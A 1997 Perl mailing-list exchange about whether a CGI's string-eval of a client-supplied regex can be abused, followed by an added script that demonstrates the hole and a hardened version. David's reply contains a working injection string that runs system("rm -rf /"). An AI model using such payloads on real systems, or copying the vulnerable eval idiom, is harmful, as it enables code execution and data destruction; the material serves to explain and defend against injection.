I found one:

    $regexp="any_string#; system(\"rm -rf /\"); m#any_string";
    eval " \$found = m#$regexp# ";

That will execute the system command without any problem under perl5.004 on a UNIX box.

-David

On Mon, 18 Aug 1997, Aperghis-Tramoni Sebastian wrote:

> I have written a CGI which works (for now! :-) ) but I'd want to add a
> feature which uses Perl regexp. So my question is: can anyone use the
> following code in order to do forbidden things?
>
>     eval " \$found = m#$regexp# "
>
> where the $regexp variable directly comes from $ENV{'QUERY_STRING'}.
>
> I would really like to know that because for now, I can't find any hole, and
> I don't want to use something which could be dangerous in my CGI.
>
> Thanks in advance.
>
> ***** Want to unsubscribe from this list?
> ***** Send mail with body "unsubscribe" to mac-perl-request@iis.ee.ethz.ch
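The hole David points out, as an added example that is not part of the thread: the same string-eval idiom with the system() payload replaced by a harmless flag so the script can be run, next to a version that interpolates the client's text into the match operator directly instead of rebuilding Perl source from it. The input strings and the safe_match helper are constructed for this example.

```perl
#!/usr/bin/perl
# Added example, not from the original thread. Shows why
#   eval " \$found = m#$regexp# "
# is code injection, and a form that only ever compiles the input as a pattern.
use strict;
use warnings;

# Constructed stand-ins for the text being searched and for $ENV{'QUERY_STRING'}.
my $text    = "hello world";
my $payload = 'hello#; $main::injected = 1; m#hello';  # closes m#..#, runs code, reopens

our $injected = 0;   # set to 1 only if attacker-supplied code runs
our $found;

# 1. The CGI's idiom: $payload is interpolated into a STRING and the string is
#    eval'ed, so the '#' in the query ends the match and everything after it is
#    compiled and executed as Perl. David's payload called system(); this one
#    just flips a flag.
$_ = $text;
eval " \$found = m#$payload# ";
print "string-eval: injected=$injected found=", ($found ? 1 : 0), "\n";

# 2. Hardened: the query goes into the match operator as a pattern, never as
#    source. '#', ';' and 'system' are ordinary pattern characters here, and a
#    block eval turns a pattern that fails to compile into a rejection instead
#    of a die() in the middle of the CGI. (Modern perls also refuse (?{ }) code
#    blocks in an interpolated pattern unless "use re 'eval'" is in effect.)
$injected = 0;
print "block-eval:  injected=$injected found=", safe_match($text, $payload),  "\n";
print "block-eval:  found=",                  safe_match($text, 'wor.d'),     "\n";
print "block-eval:  found=",                  safe_match($text, '(unbalanced'), "\n";

sub safe_match {
    my ($string, $re) = @_;
    my $hit = eval { $string =~ /$re/ ? 1 : 0 };
    if ($@) {                       # pattern from the client did not compile
        warn "rejected pattern: $@";
        return 0;
    }
    return $hit;
}
```

Running it prints injected=1 for the string eval and injected=0 for the block eval against the same payload; the unbalanced-paren call warns and returns 0 rather than killing the script.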